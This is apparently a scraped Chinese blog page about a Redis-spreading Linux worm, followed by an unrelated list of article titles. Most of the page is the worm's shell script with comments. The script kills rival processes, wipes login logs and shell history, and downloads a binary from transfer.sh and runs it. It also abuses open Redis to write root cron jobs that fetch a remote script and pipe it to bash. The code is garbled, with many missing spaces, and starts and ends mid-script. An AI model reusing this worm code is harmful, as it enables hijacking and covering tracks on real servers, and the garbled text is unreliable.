linux redis病毒,Linux系统之Redis扩散病毒继续分析
* soft nproc 100000
root hard nproc 100000
root soft nproc 100000
EOF
#防火墙修改redis只让本机访问
iptables -I INPUT 1 -p tcp --dport 6379-j DROP
iptables -I INPUT 1 -p tcp --dport 6379-s 127.0.0.1 -j ACCEPT
#杀掉包含下列字符串的进程,好疯狂。
ps xf | grep -v grep | grep "redis-server\|nicehash\|linuxs\|linuxl\|crawler.weibo\|243/44444\|cryptonight\|stratum\|gpg-daemon\|jobs.flu.cc\|nmap\|cranberry\|start.sh\|watch.sh\|krun.sh\|killTop.sh\|cpuminer\|/60009\|ssh_deny.sh\|clean.sh\|\./over\|mrx1\|redisscan\|ebscan\|redis-cli\|barad_agent\|\.sr0\|clay\|udevs\|\.sshd\|/tmp/init"| while read pid _; do kill -9 "$pid"; done
#又删除/tmp和/var/tmp下的文件
rm -rf /tmp/* 2>/dev/null
rm -rf /var/tmp/* 2>/dev/null
#清除登录日志、历史记录
echo 0 > /var/spool/mail/root
echo 0 > /var/log/wtmp
echo 0 > /var/log/secure
echo 0 > /root/.bash_history
#下载安装相应的库和软件包
YUM_PACKAGE_NAME="iptables gccredis coreutils bash curl wget"
DEB_PACKAGE_NAME="coreutils bashbuild-essential make gcc redis-server redis-tools redis iptables curl"
#如果是CentOS系统,用yum下载安装
if cat /etc/*release | grep -i CentOS;then
yum clean all
yum install -y -q epel-release
yum install -y -q $YUM_PACKAGE_NAME
#如果是Redhat系统,用yum下载安装
elif cat /etc/*release | grep -qi Red;then
yum clean all
yum install -y -q epel-release
yum install -y -q $YUM_PACKAGE_NAME
#如果是Fedora系统,用yum下载安装
elif cat /etc/*release | grep -qiFedora; then
yum clean all
yum install -y -q epel-release
yum install -y -q $YUM_PACKAGE_NAME
#如果是Ubuntu系统,用apt下载安装
elif cat /etc/*release | grep -qiUbuntu; then
export DEBIAN_FRONTEND=noninteractive
rm -rf /var/lib/apt/lists/*
apt-get update -q --fix-missing
for PACKAGE in $DEB_PACKAGE_NAME;doapt-get install -y -q $PACKAGE; done
#如果是Debian系统,用apt下载安装
elif cat /etc/*release | grep -qiDebian; then
export DEBIAN_FRONTEND=noninteractive
rm -rf /var/lib/apt/lists/*
apt-get update --fix-missing
for PACKAGE in $DEB_PACKAGE_NAME;doapt-get install -y -q $PACKAGE; done
#如果是Mint系统,用apt下载安装(Linux Mint由Linux MintTeam团队于2006年开始发行,是一份基于Debian和Ubuntu的Linux发行版)
elif cat /etc/*release | grep -qi Mint;then
export DEBIAN_FRONTEND=noninteractive
rm -rf /var/lib/apt/lists/*
apt-get update --fix-missing
for PACKAGE in $DEB_PACKAGE_NAME;doapt-get install -y -q $PACKAGE; done
#如果是Knoppix系统,用apt下载安装(KNOPPIX是一个linux发行版,基于debian,功能包括:自动硬件监测、支持常见的显卡、声卡、SCSI和USB设备,以及其它外设)
elif cat /etc/*release | grep -qiKnoppix; then
export DEBIAN_FRONTEND=noninteractive
rm -rf /var/lib/apt/lists/*
apt-get update --fix-missing
for PACKAGE in $DEB_PACKAGE_NAME;doapt-get install -y -q $PACKAGE; done
else
exit 1
fi
sleep 1
#如果本地不存在pnscan,则去下载
if ! ( [ -x /usr/local/bin/pnscan ] || [-x /usr/bin/pnscan ] ); then
curl -kLshttps://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12 > .x112 || wget -q-O .x112 https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12
sleep 1
#解压、编译、安装pnscan
[ -f .x112 ] && tar xf .x112&& cd pnscan-1.12 && make lnx && make install&& cd .. && rm -rf pnscan-1.12 .x112
fi
tname=$( mktemp )
#从transfer.sh下载tmp.Woq2ONMx8z文件
OMURL=https://transfer.sh/lBphf/tmp.Woq2ONMx8z
curl -s $OMURL > $tname || wget -q -O$tname $OMURL
NMURL=$( curl -s --upload-file $tnamehttps://transfer.sh )
#文件改名、增加执行属性、运行后删除(进程为.gpg)
mv $tname .gpg && chmod +x .gpg&& ./.gpg && rm -rf .gpg
[ -z "$NMURL" ] &&NMURL=$OMURL
ncmd=$(basename $(mktemp))
sed 's|'"$OMURL"'|'"$NMURL"'|g' $ncmd
NSURL=$( curl -s --upload-file $ncmdhttps://transfer.sh )
#对redis进行操作,添加定时任务
echo 'flushall' > .dat
echo 'config set dir /var/spool/cron'>> .dat
echo 'config set dbfilename root'>> .dat
echo 'set Backup1 "\t\n*/2 * * * * curl-s '${NSURL}' > .cmd && bash .cmd\n\t"' >> .dat
echo 'set Backup2 "\t\n*/5 * * * *wget -O .cmd '${NSURL}' && bash .cmd\n\t"' >> .dat
echo 'set Backup3 "\t\n*/10 * * * *lynx -source '${NSURL}' > .cmd && bash .cmd\n\t"' >> .dat
echo 'save' >> .dat
echo 'config set dir/var/spool/cron/crontabs' >> .dat
linux redis病毒,Linux系统之Redis扩散病毒继续分析相关推荐
- Redis在Linux系统的配置优化
通常来看,Redis开发和运维人员更加关注的是Redis本身的一些配置优化,例如AOF和RDB的配置优化.数据结构的配置优化等,但是对于操作系统是否需要针对Redis做一些配置优化不甚了解或者不太关心 ...
- linux redis数据库安装配置,Linux系统中redis的安装配置步骤
Linux系统中redis的安装配置步骤 发布时间:2020-06-23 10:13:36 来源:亿速云 阅读:87 作者:Leah 这篇文章将为大家详细讲解有关Linux系统中redis的安装配置步 ...
- linux系统搭建redis cluster集群 切片集群 教程 centOS系统redis6
目录 一.说明 二.环境信息 三.介绍 四.部署流程 五.测试 一.说明 该教程为redis集群-cluster切片集群部署方式,不包含redis的安装过程,如需redis安装教程请移步以下链接: & ...
- Redis基于Linux系统的安装与集群搭建
最近项目里需要引入Redis,这里记录下Redis的安装.这里以centos7为例,首先我们需要确保防火墙关闭 systemctl status firewalld.service //查看防火墙状态 ...
- linux redis 日志在哪里,Redis的日志系统
今天中间件接口响应时间很长,经过大致排查,发现是访问Redis慢,并且Redis的cpu确实已经飙到了98%左右,现在需要定位问题.先打开redis的slowlog. 什么是 SLOWLOG Slow ...
- linux的iso镜像机没有redis,在Linux系统上安装Redis【避坑篇】
redis官网下载地址,当前稳定版本是6.0.0. redis的下载 具体下载方式依照当前网页下面提供的命令即可: # 下载及安装 wget http://download.redis.io/rele ...
- Linux 系统中 Redis 的安装及其使用
安装及使用 redis 安装 sudo apt-get install redis-server# 安装后, Redis 会自动启动,通过下列命令检查ps -elf|grep redis netsta ...
- Linux系统清理redis 命令
1.确认 redis 是否运行 ps-ef | grep redis 2.进入 redis 命令 /bin/redis-cli 或者使用 redis-cli -h 127.0.0.1 -p 6379 ...
- redis在Linux上的安装
1.redis在Linux上的安装 1)安装redis编译的c环境,yum install gcc-c++ 2)将redis-2.6.16.tar.gz上传到Linux系统中 3)解压到/usr/lo ...
最新文章
- 到底什么时候不应该使用机器学习?
- Cinder LVM Oversubscription in thin provisioning
- java arraylist的初始化和数组的相互转化
- php无法下单功能,PHP如何解决并发下单问题?(不一定是下单,举个例)
- 树莓派3 kali linux很卡,树莓派3装kali Linux 成功写入 但是点不亮 为什么?
- release8_如何在Windows 8 Release Preview中将Chrome用作Metro浏览器
- Spring 3.1缓存抽象教程
- ComponentOne FlexGrid for WinForms 中文版快速入门(4)--设置单元格格式
- Springboot2拦截器与文件上传
- python nltk.download报错_python 文本转语音机器学习之nltk download安装测试包
- MP4转AVI转AMV教程:教你把B站视频导入你的MP3MP4随身听播放器
- XRD .txt 格式转 .xrdml格式
- 使用vue实现四级联动
- wordpress目录文件结构
- Excel多个sheet导出pdf
- 爬虫实例 8684公交网-太原公交线路信息
- 煮酒探西游 吴闲云全面解读西游记
- 智源社区AI周刊No.97:Bengio新论文用GFlowNets统一生成模型;北大发布AI for EDA数据集...
- 改进Zhang Suen细化算法的C#实现
- 虚拟现实技术利用计算机,虚拟现实 虚拟现实技术是一种可以创建和体验虚拟世界的计算机仿真系统它利用计算机生...